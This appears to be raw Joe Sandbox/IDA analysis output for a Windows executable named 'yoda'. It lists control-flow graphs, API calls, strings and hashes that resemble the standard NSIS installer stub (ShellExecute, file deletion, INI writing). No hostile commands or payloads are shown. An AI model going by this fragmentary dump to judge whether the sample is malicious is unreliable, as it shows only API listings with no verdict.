                                                                                                                                                                                                                                                                control_flow_graph 714 404f9e-404fb1 715 404fb7-404fca 714->715 716 40506e-405070 714->716 717 404fd5-404fe1 lstrlenW 715->717 718 404fcc-404fd0 call 406831 715->718 720 404fe3-404ff3 lstrlenW 717->720 721 404ffe-405002 717->721 718->717 722 404ff5-404ff9 lstrcatW 720->722 723 40506c-40506d 720->723 724 405011-405015 721->724 725 405004-40500b SetWindowTextW 721->725 722->721 723->716 726 405017-405059 SendMessageW * 3 724->726 727 40505b-40505d 724->727 725->724 726->727 727->723 728 40505f-405064 727->728 728->723
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00445D80,00427176,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427176,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2740478559-0

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                • String ID: %TechnoBecome%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                • API String ID: 247603264-3880727211

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427176,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                • API String ID: 3156913733-2180253247

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                • String ID: nsa
                                                                                                                                                                                                                                                                • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: HideWindow
                                                                                                                                                                                                                                                                • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FilePointer
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 973152223-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                • String ID: $ @$M$N
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                  • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                  • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427176,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                • String ID: F$A
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                Strings
Memory Dump Source
• Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                APIs
